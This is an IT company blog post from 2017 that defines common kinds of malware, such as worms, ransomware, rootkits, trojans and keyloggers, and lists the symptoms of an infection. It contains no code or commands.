What is malware?
April 26th, 2017
Malware (short for malicious software) is an umbrella term which refers to software designed to disrupt, damage or gain access to a computer system, without knowledge or consent of the owner. Malware can compromise computer functions, steal data, bypass access controls and cause other types of harm.
A piece of malware is usually categorised into one of several types. This is determined based on the intent of the creator and what forms it takes. For example, if it’s executable code, a script, active content or other software.
What are the most commons forms of malware?
Short for advertising-supported malware. Adware is malware which delivers unwanted advertisements to a user’s machine. These can be pop-ups on websites or on-screen messages that the malware displays.
Most adware is sponsored or authored by advertisers and serves as a revenue-generating tool. Some adware also includes spyware, increasing its danger and allowing it to track user activity and steal information.
Bots are software programs created to automatically perform certain actions. Although some bots are created for harmless purposes, malicious use is increasingly common. Bots are used for a range of activities including:
- In botnets for DDoS attacks;
- As spambots that render advertisements on websites; and
- As web spiders which scrape information or distribute malware.
A bug is a flaw in a piece of software which produces an undesired outcome. While not inherently malicious, they can be exploited by bad actors. Allowing them to produce bypass traditional methods of protection.
There are different severities of bugs. Minor bugs only have a small impact on usability, often going unnoticed for long periods of time. Major bugs have a greater impact and can cause issues like freezing or crashing. And security bugs are the most severe of all types. These allow attacks to bypass user authentication, override access privileges or steal data.
Bugs are typically the result of human error whilst creating the source code of a program. For programs in active development, bugs are often addressed in patches once a fix is created.
Because patches are the only way to fix bugs, having a patch management strategy in place can help ensure your software is always up-to-date. This ensures malicious exploits are closed before they can become an issue.
Computer worms are the most common form of malware. They spread over computer networks by exploiting vulnerabilities in the operating system and cause harm by consuming bandwidth and overloading web servers.
A worm can also contain a payload which it delivers to infected machines. Payloads are pieces of code which run upon infection and perform specific actions. This could be data theft, file deletion or botnet creation.
Crypto-jacking is a type of malware which steals an infected computer’s processing power. The hijacked processing is then used to illegally mine crypto-currencies such as Bitcoin, Monero or Etherium.
Crypto-jacking is most profitable when it stays undetected for a long period of time. As a result, hackers have designed it to have a smaller digital footprint than most malware. Often the only sign of a crypto-jacking infection is a reduction in performance. But since so many other factors can this, crypto-jacking is difficult to detect.
By staying undetected, crypto-jacking can wear computer hardware down. And because machines will always be under full load, components will degrade faster. This can damage hardware, lower employee productivity and raise electricity bills.
A fileless infection is where malware achieves persistence on a machine by coding itself directly into memory. This is instead of existing as a file onto the target computer’s hard drive.
Fileless malware is a major problem because it renders the signature-based approach of malware detection useless. This is because, without a file, there isn’t a signature to detect.
Unfortunately, every conventional anti-malware software uses the signature-based approach. So as a result, fileless malware is often undetectable.
A keylogger is a type of surveillance software which records the keystrokes a user makes. This can result in the malware recording passwords, bank details or personal information.
Once it’s recorded, the information is then sent back to the hacker. From there, they can either use it to gain unauthorised access to systems or to sell on the dark web.
Ransomware is a type of malware which restricts a user’s access to their computer then demands a ransom to restore access. Access is restricted most commonly by encrypting the user’s files. But screen overlays and other methods do exist.
Once infected, ransomware displays threatening or frightening messages to make the user pay up. For example, threatening to permanently delete all files if a sum of money is not paid within 24 hours.
Sometimes, ransomware authors pose as security bodies such as the police, GCHQ or the CIA. Often they use a message saying that access has been restricted due to the presence of illegal material on the machine. They will then ask the user to pay a ‘fine’ to restore access. This is still ransomware and is a scam.
A Rootkit is malware which gives hackers remote access or control to a computer. This allows them to access files, change settings and install further malware without the user’s knowledge.
Rootkits are particularly dangerous because they open the flood gates for the hacker. Once installed, a rootkit lets them:
- Access files and programs
- Delete or add files and programs
- Disable security settings
- Steal sensitive data
- Change system configurations and software
- Install further malware
- Control the computer as part of a botnet
And a lot more. Once infected with a rootkit, a machine can become the staging post for further attacks. And as a result, represents a significant security vulnerability.
Scareware is malware which tricks users into purchasing useless or harmful software. It can take the form of fake virus alerts, false software updates or sham malware removal tools.
Often scareware exploits a bug to create the appearance of a problem on a user’s machine. This frightens the user into purchasing the scareware since they think it will fix their issue.
Once installed, the scareware may run ‘scans’ which end up detecting more ‘threats’ and convince you to pay for their removal. Alternatively, it might run ‘scans’ which ‘fix’ the ‘problem’ but actually install more malware.
Spyware is surveillance malware which monitors the actions of a user. Spyware is often more advanced than a keylogger and can steal much more information. This can include activity monitoring, collecting keystrokes, harvesting data, recording screen sessions and more.
Trojans are malware which hides inside ordinary files or programs to trick a user into thinking it’s safe. Once downloaded and installed, a Trojan can execute its malicious payload and infect the computer.
Like with a worm, the payload can perform different actions. The payload can steal data, install more malware, change files, record user activity or use the computer in botnets.
A virus is a form of malware capable of copying itself and spreading to other computers. They often spread by attaching themselves to programs and executing code when launched. Viruses can spread through script files, documents, and cross-site scripting vulnerabilities in web apps.
All malware spreads and affects computers in different ways, but there are some common symptoms you can look out for.
- Near 100% CPU usage
- Slow computer or web browser speeds
- Problems connecting to networks
- Modified or deleted files
- Unwanted advertisements appearing on screen
- Strange files, programs or desktop icons
- Programs running, turning off or reconfiguring themselves
- Strange computer behaviour
- Emails sent without the users’ knowledge
In the press: Digitising courtrooms & law firms
Digital was a key focus of the Autumn Statement this year, with a total of £1.8 billion in planned investments listed by the Chancellor at the end of November. Part of this embrace of digital included an allocation of £700 million to fully digitise the courtrooms, moving from the current paper-based system to an online […]
Why should you diversify your IT investment
Investing in a company’s IT systems is now a regular part of planning. However, it’s easy to focus on only a few areas of the business instead of taking a holistic approach. In order to avoid this scenario, the company must look at all areas of the business to build a robust IT infrastructure. How […]
What is a hybrid IT strategy?
A hybrid IT strategy is where neither 100% cloud nor 100% physical infrastructure is used. There is a mix of cloud services and in-house services being used within the IT environment. Hybrid IT strategy allows businesses to maintain a centralised approach whilst also utilising the benefits of cloud such as its’ scalability, performance and a […]